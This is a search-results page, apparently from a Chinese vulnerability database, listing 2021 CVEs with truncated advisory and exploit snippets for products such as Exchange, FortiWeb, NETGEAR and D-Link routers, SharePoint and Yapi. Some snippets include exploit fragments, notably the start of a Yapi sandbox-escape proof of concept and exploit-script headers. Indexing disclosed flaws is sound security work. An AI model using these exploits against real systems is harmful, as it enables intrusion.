56796 matches found
Atlassian Jira 文件读取漏洞(CVE-2021-26086)
...
Fortinet FortiWeb 授权命令注入漏洞(CVE-2021-22123)
Fortinet FortiWeb OS Command Injection Aug 17, 2021 5 min read An OS command injection vulnerability in FortiWeb's management interface version 6.3.11 and prior can allow a remote, authenticated attacker to execute arbitrary commands on the system, via the SAML server configuration page. This is ...
Exchange ProxyOracle 信息泄露漏洞利用链(CVE-2021-31195、 CVE-2021-31196)
...
华域reporter 命令注入漏洞
...
Cisco多款VPN路由器管理界面授权RCE漏洞(CVE-2021-1414)
...
Buffalo和Arcadyan多款路由器认证绕过RCE等多个漏洞
Tenable has discovered multiple vulnerabilities in routers manufactured by Arcadyan. During the disclosure process for the issues discovered in the Buffalo routers, Tenable discovered that CVE-2021-20090 affected many more devices, as the root cause of the vulnerability exists in the underlying...
UDP Technology IP 摄像头认证绕过 RCE 漏洞(CVE-2021-33543、CVE-2021-33544)
...
Pulse Connect Secure 授权 RCE (CVE-2021-22937) 漏洞
...
exchange proxyshell 远程代码执行利用链
...
Jetty WEB-INF 信息泄露漏洞(CVE-2021-34428)
...
MCMS fastjson解析RCE漏洞
...
Elasticsearch ECE 7.13.3信息泄露漏洞(CVE-2021-22146)
Exploit Title: Elasticsearch ECE 7.13.3 - Anonymous Database Dump Date: 2021-07-21 Exploit Author: Joan Martinez @magichk Vendor Homepage: https://www.elastic.co/ Software Link: https://www.elastic.co/ Version: = 7.10.0 to = 7.13.3 Tested on: Elastic ECE Cloud CVE : CVE-2021-22146 Reference:...
Denver Smart Wifi Camera SHC-150 - 'Telnet' 远程代码执行漏洞
Exploit Title: Denver Smart Wifi Camera SHC-150 - 'Telnet' Remote Code Execution RCE Date: 27 July 2021 Exploit Author: Ivan Nikolsky enty8080 Vendor Homepage: https://denver.eu/products/smart-home-security/denver-shc-150/c-1024/c-1243/p-3824 Version: Denver SHC-150 all firmware versions Tested o...
Apache Tomcat HTTP请求走私(CVE-2021-33037)
...
Rocket.Chat 3.12.1远程代码执行(CVE-2021-22911)
Title: Rocket.Chat 3.12.1 - NoSQL Injection to RCE Unauthenticated 2 Author: enox Date: 06-06-2021 Product: Rocket.Chat Vendor: https://rocket.chat/ Vulnerable Versions: Rocket.Chat 3.12.1 2 CVE: CVE-2021-22911 Credits: https://blog.sonarsource.com/nosql-injections-in-rocket-chat Info : This is a...
Ehcache RMI 远程代码执行漏洞( CVE-2020-36239)
...
D-LINK DIR-3040 Libcli 命令注入漏洞(CVE-2021-21819)
The DIR-3040 is an AC3000-based wireless internet router. As discussed in TALOS-2021-1285, a hidden telnet service can be started without authentication by visiting https:///starttelnet This service presents the user with a login prompt for their “libcli test environment”: $ telnet 192.168.0.1...
D-LINK DIR-3040 Zebra IP 路由管理器信息泄露漏洞(CVE-2021-21817)
The DIR-3040 is an AC3000-based wireless internet router. Zebra is an IP routing manager that provides kernel routing table updates, interface lookups, and redistribution of routes between different routing protocols. The DIR-3040 runs this service by default on TCP port 2601 and can be accessed ...
D-LINK DIR-3040 服务组件使用默认密码(CVE-2021-21818)
The DIR-3040 is an AC3000-based wireless internet router. Zebra is an IP routing manager that provides kernel routing table updates, interface lookups, and redistribution of routes between different routing protocols. The DIR-3040 runs this service by default on TCP port 2601 and can be accessed ...
Dell OpenManage Enterprise docker实例预认证RCE认证绕过漏洞(CVE-2021-21596)
Details - Remote Auth Bypass with 2 pre-auth RCEs in docker instances There is a chain of pre-auth vulnerabilities allowing to: get a shell on the redis container, as redis get a shell on the postgres container, as postgres get a full access to the postgres database bypass authentication on the w...
woocommerce 插件 SQL注入漏洞
...
NETGEAR GS110TPV3未认证命令注入漏洞(CVE-2021-33514)
Summary: Affected Model: NETGEAR GS110TPV3 Smart Managed Pro Switch Firmware Version: V7.0.5.2 from 2021-01-11 NETGEAR GS110TPV3 Smart Managed Pro Switch is vulnerable to a pre-auth shell injection due to incorrect input handling in setup.cgi query parameters. This allows an attacker in the same...
ThinkPHP3.2.x 远程代码执行
...
Nagiosxi 5.8.4 授权RCE漏洞
...
NETGEAR WAC104身份验证绕过漏洞(CVE-2021-35973)
Summary: Affected Model: NETGEAR WAC104 Dual Band 802.11ac Wireless Access Point Firmware Version: V1.0.4.13 from 2020-09-14 NETGEAR WAC104 Access Point has multiple vulnerabilities which - chained together - allow an attacker in LAN to both change device admin's password, and gain root shell on...
Microsoft SharePoint Server 远程代码执行漏洞(CVE-2021-28474)
In May of 2021, Microsoft released a patch to correct CVE-2021-28474, a remote code execution bug in supported versions of Microsoft SharePoint Server. This bug was reported to ZDI by an anonymous researcher and is also known as ZDI-21-574. This blog takes a deeper look at the root cause of this...
Yapi 远程命令执行漏洞
如何复现此问题 登录注册后,创建一个项目 然后选择设置全局的mock脚本,设置命令为远程访问我的服务器地址。 随后添加接口,访问接口的mock地址 服务器可看到响应如下,远程服务器接受到请求 poc: const sandbox = this const ObjectConstructor = this.constructor const FunctionConstructor = ObjectConstructor.constructor const myfun = FunctionConstructor'return process' const process = myfun...
IBM QRadar SIEM 服务器端请求伪造 SSRF(CVE-2020-4786)
...
Netgear DGN2200v1 远程命令执行
Exploit Title: Netgear DGN2200v1 - Remote Command Execution RCE Unauthenticated Date: 02.07.2021 Exploit Author: SivertPL Vendor Homepage: https://www.netgear.com/ Version: All prior to v1.0.0.60 !/usr/bin/python """ NETGEAR DGN2200v1 Unauthenticated Remote Command Execution Author: SivertPL...
Jspxcms 后台RCE漏洞
...
Visual Tools DVR VX16 未授权命令注入
...
KGUARD DVR 未授权命令执行漏洞
...
ForgeRock AM远程代码执行漏洞(CVE-2021-35464)
Pre-auth RCE in ForgeRock OpenAM CVE-2021-35464 Michael Stepankin Researcher @artsploit Published: 29 June 2021 at 11:23 UTC Updated: 29 June 2021 at 18:15 UTC While participating in one private bug bounty program, I discovered a pre-auth RCE in ForgeRock OpenAM server - a popular access manageme...
Node-RED-Dashboard 任意文件读取漏洞 (CVE-2021-3223)
...
IceWarp 未授权RCE漏洞
...
IceWarp 反射型XSS (CVE-2020-8512)漏洞
...
泛微E-mobile前台sql注入漏洞
...
SonicWall NSM On-Prem命令执行漏洞(CVE-2021-20026)
...
Windows Print Spooler权限提升漏洞(CVE-2021-1675)
...
QNAP Roon Server未授权RCE漏洞(CVE-2021-28810、CVE-2021-28811)
...
Linux Polkit权限提升漏洞(CVE-2021-3560)
Privilege escalation with polkit: How to get root on Linux with a seven- year-old bug Kevin Backhouse https://github.blog/author/kevinbackhouse/ polkit is a system service installed by default on many Linux distributions. It's used by systemd, so any Linux distribution that uses systemd also uses...
Joomla 存储型XSS漏洞(CVE-2021-26032)
JOOMLA PASSWORD RESET VULNERABILITY AND A STORED XSS FOR FULL COMPROMISE Intro Joomla is one of the most popular CMS-es with over 1.5 million installations world-wide. We pentested Joomla 3.9.24 and found a password reset vulnerability which we chained with a set of vulnerabilities and features t...
Atlassian Jira 信息泄露漏洞(CVE-2020-36289)
...
Eclipse Jetty 信息泄露漏洞(CVE-2021-28169)
...
Synology Audio Station 远程代码执行漏洞
...
Lucee Server 未授权RCE漏洞(CVE-2021-21307)
Finding 0day to hack Apple Getting started We started hacking on Apple after the infamous blog post by Sam, et al. The goal was to focus on critical findings such as PII exposure or getting access to Apple's servers/internal network. These are the types of bugs we thought Apple would be most...
用友NC BeanShell远程代码执行漏洞
...
畅乘科技--北斗主动安全云平台默认弱口令
...
CHIYU IoT services Authentication bypass in telnet server(CVE-2021-31251)
...
Microsoft SharePoint远程代码执行漏洞(CVE-2021-31181)
CVE-2021-31181: MICROSOFT SHAREPOINT WEBPART INTERPRETATION CONFLICT REMOTE CODE EXECUTION VULNERABILITY June 02, 2021 | The ZDI Research Team In May of 2021, Microsoft released a patch to correct CVE-2021-31181 – a remote code execution bug in the supported versions of Microsoft SharePoint Serve...